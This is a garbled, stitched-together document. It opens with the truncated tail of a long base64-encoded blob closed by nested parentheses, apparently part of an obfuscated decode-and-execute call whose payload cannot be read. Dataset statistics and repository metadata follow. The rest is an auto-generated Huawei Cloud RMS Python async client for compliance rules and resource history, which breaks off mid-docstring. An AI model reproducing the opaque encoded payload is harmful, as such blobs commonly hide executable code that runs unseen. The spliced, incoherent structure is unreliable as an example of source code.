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"))))
| 742.9375
| 5,862
| 0.962228
| 398
| 11,887
| 28.731156
| 0.51005
| 0.001924
| 0.002798
| 0.003498
| 0.989943
| 0.989943
| 0.989943
| 0.989943
| 0.989943
| 0.989943
| 0
| 0.156208
| 0.002608
| 11,887
| 15
| 5,863
| 792.466667
| 0.808283
| 0.009674
| 0
| 0.666667
| 0
| 0.666667
| 0.986571
| 0.986571
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 15
|
f30cb1a6c95b09e7886a49f2540f3f14a511fcd8
| 53,825
|
py
|
Python
|
huaweicloud-sdk-rms/huaweicloudsdkrms/v1/rms_async_client.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | 64
|
2020-06-12T07:05:07.000Z
|
2022-03-30T03:32:50.000Z
|
huaweicloud-sdk-rms/huaweicloudsdkrms/v1/rms_async_client.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | 11
|
2020-07-06T07:56:54.000Z
|
2022-01-11T11:14:40.000Z
|
huaweicloud-sdk-rms/huaweicloudsdkrms/v1/rms_async_client.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | 24
|
2020-06-08T11:42:13.000Z
|
2022-03-04T06:44:08.000Z
|
# coding: utf-8
from __future__ import absolute_import
import datetime
import re
import importlib
import six
from huaweicloudsdkcore.client import Client, ClientBuilder
from huaweicloudsdkcore.exceptions import exceptions
from huaweicloudsdkcore.utils import http_utils
from huaweicloudsdkcore.sdk_stream_request import SdkStreamRequest
class RmsAsyncClient(Client):
    """Asynchronous client for the RMS (Resource Management Service) API.

    :param configuration: .Configuration object for this client
    :param pool_threads: The number of threads to use for async requests
        to the API. More threads means more concurrent API requests.
    """

    # Types that are deserialized as-is, without a model class lookup.
    PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
    # Maps OpenAPI type names to Python types.  'long' only exists on
    # Python 2, hence the six.PY3 guard.
    NATIVE_TYPES_MAPPING = {
        'int': int,
        'long': int if six.PY3 else long,
        'float': float,
        'str': str,
        'bool': bool,
        'date': datetime.date,
        'datetime': datetime.datetime,
        'object': object,
    }
    def __init__(self):
        """Initialize base Client machinery and bind SDK defaults."""
        super(RmsAsyncClient, self).__init__()
        # Model package — presumably used by the base Client to resolve
        # response model classes by name; TODO confirm against Client.
        self.model_package = importlib.import_module("huaweicloudsdkrms.v1.model")
        # Default headers sent with every request.
        self.preset_headers = {'User-Agent': 'HuaweiCloud-SDK-Python'}
@classmethod
def new_builder(cls, clazz=None):
if clazz is None:
return ClientBuilder(cls, "GlobalCredentials")
if clazz.__name__ != "RmsClient":
raise TypeError("client type error, support client type is RmsClient")
return ClientBuilder(clazz, "GlobalCredentials")
    def show_resource_history_async(self, request):
        """Query resource history.

        Query the change history of a resource and of its relations
        to other resources.

        :param ShowResourceHistoryRequest request
        :return: ShowResourceHistoryResponse
        """
        # Thin delegate to the HTTP-info builder for this operation.
        return self.show_resource_history_with_http_info(request)
def show_resource_history_with_http_info(self, request):
    """Query resource history.

    Queries the change history of a resource and of its resource relations.

    :param ShowResourceHistoryRequest request
    :return: ShowResourceHistoryResponse
    """
    all_params = ['resource_id', 'marker', 'limit', 'earlier_time', 'later_time', 'chronological_order']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}

    path_params = {}
    if 'resource_id' in local_var_params:
        path_params['resource_id'] = local_var_params['resource_id']

    # Optional query-string parameters, kept in the original order.
    query_params = [(name, local_var_params[name])
                    for name in ('marker', 'limit', 'earlier_time',
                                 'later_time', 'chronological_order')
                    if name in local_var_params]

    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/resources/{resource_id}/history',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ShowResourceHistoryResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def create_policy_assignments_async(self, request):
    """Create a compliance rule.

    Creates a new compliance rule (policy assignment).

    :param CreatePolicyAssignmentsRequest request
    :return: CreatePolicyAssignmentsResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.create_policy_assignments_with_http_info(request)
    return http_info
def create_policy_assignments_with_http_info(self, request):
    """Create a compliance rule.

    Creates a new compliance rule (policy assignment).
    NOTE(review): this "create" endpoint issues PUT, not POST — matches the
    upstream API definition; confirm if it looks surprising.

    :param CreatePolicyAssignmentsRequest request
    :return: CreatePolicyAssignmentsResponse
    """
    all_params = ['policy_assignment_request_body']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = {}

    # Request body, if one was provided; a streaming request overrides it
    # with its file stream.
    body_params = local_var_params.get('body')
    if isinstance(request, SdkStreamRequest):
        body_params = request.get_file_stream()

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments',
        method='PUT',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='CreatePolicyAssignmentsResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def delete_policy_assignment_async(self, request):
    """Delete a compliance rule.

    Deletes the rule identified by its rule ID.

    :param DeletePolicyAssignmentRequest request
    :return: DeletePolicyAssignmentResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.delete_policy_assignment_with_http_info(request)
    return http_info
def delete_policy_assignment_with_http_info(self, request):
    """Delete a compliance rule.

    Deletes the rule identified by its rule ID.

    :param DeletePolicyAssignmentRequest request
    :return: DeletePolicyAssignmentResponse
    """
    all_params = ['policy_assignment_id']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}

    path_params = {}
    if 'policy_assignment_id' in local_var_params:
        path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']

    query_params = []
    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}',
        method='DELETE',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='DeletePolicyAssignmentResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def disable_policy_assignment_async(self, request):
    """Disable a compliance rule.

    Disables the rule identified by its rule ID.

    :param DisablePolicyAssignmentRequest request
    :return: DisablePolicyAssignmentResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.disable_policy_assignment_with_http_info(request)
    return http_info
def disable_policy_assignment_with_http_info(self, request):
    """Disable a compliance rule.

    Disables the rule identified by its rule ID.

    :param DisablePolicyAssignmentRequest request
    :return: DisablePolicyAssignmentResponse
    """
    all_params = ['policy_assignment_id']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}

    path_params = {}
    if 'policy_assignment_id' in local_var_params:
        path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']

    query_params = []
    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}/disable',
        method='POST',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='DisablePolicyAssignmentResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def enable_policy_assignment_async(self, request):
    """Enable a compliance rule.

    Enables the rule identified by its rule ID.

    :param EnablePolicyAssignmentRequest request
    :return: EnablePolicyAssignmentResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.enable_policy_assignment_with_http_info(request)
    return http_info
def enable_policy_assignment_with_http_info(self, request):
    """Enable a compliance rule.

    Enables the rule identified by its rule ID.

    :param EnablePolicyAssignmentRequest request
    :return: EnablePolicyAssignmentResponse
    """
    all_params = ['policy_assignment_id']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}

    path_params = {}
    if 'policy_assignment_id' in local_var_params:
        path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']

    query_params = []
    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}/enable',
        method='POST',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='EnablePolicyAssignmentResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def list_built_in_policy_definitions_async(self, request):
    """List built-in policies.

    Lists the built-in policy definitions available to the user.

    :param ListBuiltInPolicyDefinitionsRequest request
    :return: ListBuiltInPolicyDefinitionsResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.list_built_in_policy_definitions_with_http_info(request)
    return http_info
def list_built_in_policy_definitions_with_http_info(self, request):
    """List built-in policies.

    Lists the built-in policy definitions available to the user.

    :param ListBuiltInPolicyDefinitionsRequest request
    :return: ListBuiltInPolicyDefinitionsResponse
    """
    all_params = ['x_language']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}
    path_params = {}
    query_params = []

    header_params = {}
    # Optional response-language selector.
    if 'x_language' in local_var_params:
        header_params['X-Language'] = local_var_params['x_language']

    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/policy-definitions',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ListBuiltInPolicyDefinitionsResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def list_policy_assignments_async(self, request):
    """List compliance rules.

    Lists the user's compliance rules (policy assignments).

    :param ListPolicyAssignmentsRequest request
    :return: ListPolicyAssignmentsResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.list_policy_assignments_with_http_info(request)
    return http_info
def list_policy_assignments_with_http_info(self, request):
    """List compliance rules.

    Lists the user's compliance rules (policy assignments).

    :param ListPolicyAssignmentsRequest request
    :return: ListPolicyAssignmentsResponse
    """
    all_params = []

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ListPolicyAssignmentsResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def list_policy_states_by_assignment_id_async(self, request):
    """Get compliance results for a rule.

    Queries all compliance results for the given rule ID.

    :param ListPolicyStatesByAssignmentIdRequest request
    :return: ListPolicyStatesByAssignmentIdResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.list_policy_states_by_assignment_id_with_http_info(request)
    return http_info
def list_policy_states_by_assignment_id_with_http_info(self, request):
    """Get compliance results for a rule.

    Queries all compliance results for the given rule ID.

    :param ListPolicyStatesByAssignmentIdRequest request
    :return: ListPolicyStatesByAssignmentIdResponse
    """
    all_params = ['policy_assignment_id', 'compliance_state', 'resource_id', 'resource_name', 'limit', 'marker']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}

    path_params = {}
    if 'policy_assignment_id' in local_var_params:
        path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']

    # Optional query-string parameters, kept in the original order.
    query_params = [(name, local_var_params[name])
                    for name in ('compliance_state', 'resource_id',
                                 'resource_name', 'limit', 'marker')
                    if name in local_var_params]

    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}/policy-states',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ListPolicyStatesByAssignmentIdResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def list_policy_states_by_domain_id_async(self, request):
    """Get the user's compliance results.

    Queries all compliance results of the user (domain).

    :param ListPolicyStatesByDomainIdRequest request
    :return: ListPolicyStatesByDomainIdResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.list_policy_states_by_domain_id_with_http_info(request)
    return http_info
def list_policy_states_by_domain_id_with_http_info(self, request):
    """Get the user's compliance results.

    Queries all compliance results of the user (domain).

    :param ListPolicyStatesByDomainIdRequest request
    :return: ListPolicyStatesByDomainIdResponse
    """
    all_params = ['compliance_state', 'resource_id', 'resource_name', 'limit', 'marker']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}
    path_params = {}

    # Optional query-string parameters, kept in the original order.
    query_params = [(name, local_var_params[name])
                    for name in ('compliance_state', 'resource_id',
                                 'resource_name', 'limit', 'marker')
                    if name in local_var_params]

    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/policy-states',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ListPolicyStatesByDomainIdResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def list_policy_states_by_resource_id_async(self, request):
    """Get compliance results for a resource.

    Queries all compliance results for the given resource ID.

    :param ListPolicyStatesByResourceIdRequest request
    :return: ListPolicyStatesByResourceIdResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.list_policy_states_by_resource_id_with_http_info(request)
    return http_info
def list_policy_states_by_resource_id_with_http_info(self, request):
    """Get compliance results for a resource.

    Queries all compliance results for the given resource ID.

    :param ListPolicyStatesByResourceIdRequest request
    :return: ListPolicyStatesByResourceIdResponse
    """
    all_params = ['resource_id', 'compliance_state', 'limit', 'marker']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}

    path_params = {}
    if 'resource_id' in local_var_params:
        path_params['resource_id'] = local_var_params['resource_id']

    # Optional query-string parameters, kept in the original order.
    query_params = [(name, local_var_params[name])
                    for name in ('compliance_state', 'limit', 'marker')
                    if name in local_var_params]

    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/resources/{resource_id}/policy-states',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ListPolicyStatesByResourceIdResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def run_evaluation_by_policy_assignment_id_async(self, request):
    """Run a compliance evaluation.

    Evaluates the rule identified by its rule ID.

    :param RunEvaluationByPolicyAssignmentIdRequest request
    :return: RunEvaluationByPolicyAssignmentIdResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.run_evaluation_by_policy_assignment_id_with_http_info(request)
    return http_info
def run_evaluation_by_policy_assignment_id_with_http_info(self, request):
    """Run a compliance evaluation.

    Evaluates the rule identified by its rule ID.

    :param RunEvaluationByPolicyAssignmentIdRequest request
    :return: RunEvaluationByPolicyAssignmentIdResponse
    """
    all_params = ['policy_assignment_id']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}

    path_params = {}
    if 'policy_assignment_id' in local_var_params:
        path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']

    query_params = []
    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}/policy-states/run-evaluation',
        method='POST',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='RunEvaluationByPolicyAssignmentIdResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def show_built_in_policy_definition_async(self, request):
    """Query a single built-in policy.

    Queries one built-in policy definition by policy ID.

    :param ShowBuiltInPolicyDefinitionRequest request
    :return: ShowBuiltInPolicyDefinitionResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.show_built_in_policy_definition_with_http_info(request)
    return http_info
def show_built_in_policy_definition_with_http_info(self, request):
    """Query a single built-in policy.

    Queries one built-in policy definition by policy ID.

    :param ShowBuiltInPolicyDefinitionRequest request
    :return: ShowBuiltInPolicyDefinitionResponse
    """
    all_params = ['policy_definition_id', 'x_language']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}

    path_params = {}
    if 'policy_definition_id' in local_var_params:
        path_params['policy_definition_id'] = local_var_params['policy_definition_id']

    query_params = []

    header_params = {}
    # Optional response-language selector.
    if 'x_language' in local_var_params:
        header_params['X-Language'] = local_var_params['x_language']

    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/policy-definitions/{policy_definition_id}',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ShowBuiltInPolicyDefinitionResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def show_evaluation_state_by_assignment_id_async(self, request):
    """Get a rule's evaluation state.

    Queries the evaluation state of the rule identified by its rule ID.

    :param ShowEvaluationStateByAssignmentIdRequest request
    :return: ShowEvaluationStateByAssignmentIdResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.show_evaluation_state_by_assignment_id_with_http_info(request)
    return http_info
def show_evaluation_state_by_assignment_id_with_http_info(self, request):
    """Get a rule's evaluation state.

    Queries the evaluation state of the rule identified by its rule ID.

    :param ShowEvaluationStateByAssignmentIdRequest request
    :return: ShowEvaluationStateByAssignmentIdResponse
    """
    all_params = ['policy_assignment_id']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}

    path_params = {}
    if 'policy_assignment_id' in local_var_params:
        path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']

    query_params = []
    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}/policy-states/evaluation-state',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ShowEvaluationStateByAssignmentIdResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def show_policy_assignment_async(self, request):
    """Get a single compliance rule.

    Gets one rule by its rule ID.

    :param ShowPolicyAssignmentRequest request
    :return: ShowPolicyAssignmentResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.show_policy_assignment_with_http_info(request)
    return http_info
def show_policy_assignment_with_http_info(self, request):
    """Get a single compliance rule.

    Gets one rule by its rule ID.

    :param ShowPolicyAssignmentRequest request
    :return: ShowPolicyAssignmentResponse
    """
    all_params = ['policy_assignment_id']

    # Pick up every attribute that is actually set on the request object.
    local_var_params = {attr: getattr(request, attr)
                        for attr in request.attribute_map
                        if hasattr(request, attr)}

    collection_formats = {}

    path_params = {}
    if 'policy_assignment_id' in local_var_params:
        path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']

    query_params = []
    header_params = {}
    form_params = {}

    # A streaming request supplies its payload as a file stream.
    body_params = request.get_file_stream() if isinstance(request, SdkStreamRequest) else None

    response_headers = []

    header_params['Content-Type'] = http_utils.select_header_content_type(
        ['application/json'])

    return self.call_api(
        resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}',
        method='GET',
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        body=body_params,
        post_params=form_params,
        response_type='ShowPolicyAssignmentResponse',
        response_headers=response_headers,
        auth_settings=['PkiTokenAuth'],
        collection_formats=collection_formats,
        request_type=request.__class__.__name__)
def update_policy_assignment_async(self, request):
    """Update a compliance rule.

    Updates the user's compliance rule.

    :param UpdatePolicyAssignmentRequest request
    :return: UpdatePolicyAssignmentResponse
    """
    # Delegate to the builder that assembles and performs the HTTP call.
    http_info = self.update_policy_assignment_with_http_info(request)
    return http_info
def update_policy_assignment_with_http_info(self, request):
    """Update a compliance rule.

    Updates the user's compliance rule.

